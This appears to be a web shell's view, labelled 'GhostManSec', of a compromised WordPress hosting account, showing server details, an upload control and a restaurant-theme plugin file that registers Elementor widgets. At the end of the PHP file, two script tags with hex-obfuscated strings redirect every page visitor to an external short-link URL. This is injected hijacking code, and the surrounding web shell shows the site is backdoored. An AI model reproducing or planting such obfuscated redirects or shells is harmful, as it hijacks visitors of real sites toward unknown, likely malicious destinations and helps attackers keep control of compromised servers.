GhostManSec
Server: LiteSpeed
System: Linux premium197.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: parhudrw (1725)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //home/parhudrw/emenu.anqa.it/wp-content/plugins/ticrou-plugin/elementor/elementor.php
<?php

namespace TICROUPLUGIN\Element;


class Elementor {
	static $widgets = array(
		//Home Page One
		'banner_v1',
		'about_us_v1',
		'our_menu_v1',
		'feature_product_v1',
		'our_portfolio_v1',
		'features_v1',
		'our_testimonial_v1',
		'call_to_action_v1',
		'latest_news_v1',
		'contact_us_v1',
		
		//Home Page Two
		'banner_v2',
		'about_us_v2',
		'our_history_v1',
		'our_menu_v2',
		'feature_product_v2',
		'our_testimonial_v2',
		'video_section_v1',
		'features_v2',
		'contact_us_v2',
		
		//Home Page Three
		'about_us_v3',
		'features_v3',
		'our_menu_v3',
		'our_team_v1',
		'our_portfolio_v2',
		'our_testimonial_v3',
		'our_services_v1',
		'video_section_v2',
		
		//Gallery o1
		'our_portfolio_v3',
		
		//Gallery o2
		'our_portfolio_v4',
		
		//Menu
		'our_menu_v4',
		
		//Team
		'our_team_v2',
		
		//Testominial
		'our_testimonial_v4',
		
		//FAQs
		'our_faqs_v1',
		'contact_us_v3',
		
		//Blog
		'latest_news_v2',
		
		//Contact
		'contact_us_v4',
		'google_map_v1',
		
		
	);

	static function init() {
		add_action( 'elementor/init', array( __CLASS__, 'loader' ) );
		add_action( 'elementor/elements/categories_registered', array( __CLASS__, 'register_cats' ) );
	}

	static function loader() {

		foreach ( self::$widgets as $widget ) {

			$file = TICROUPLUGIN_PLUGIN_PATH . '/elementor/' . $widget . '.php';
			if ( file_exists( $file ) ) {
				require_once $file;
			}

			add_action( 'elementor/widgets/widgets_registered', array( __CLASS__, 'register' ) );
		}
	}

	static function register( $elemntor ) {
		foreach ( self::$widgets as $widget ) {
			$class = '\\TICROUPLUGIN\\Element\\' . ucwords( $widget );

			if ( class_exists( $class ) ) {
				$elemntor->register_widget_type( new $class );
			}
		}
	}

	static function register_cats( $elements_manager ) {

		$elements_manager->add_category(
			'ticrou',
			[
				'title' => esc_html__( 'Ticrou', 'ticrou' ),
				'icon'  => 'fa fa-plug',
			]
		);
		$elements_manager->add_category(
			'templatepath',
			[
				'title' => esc_html__( 'Template Path', 'ticrou' ),
				'icon'  => 'fa fa-plug',
			]
		);

	}
}

Elementor::init();
ob_start();

<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>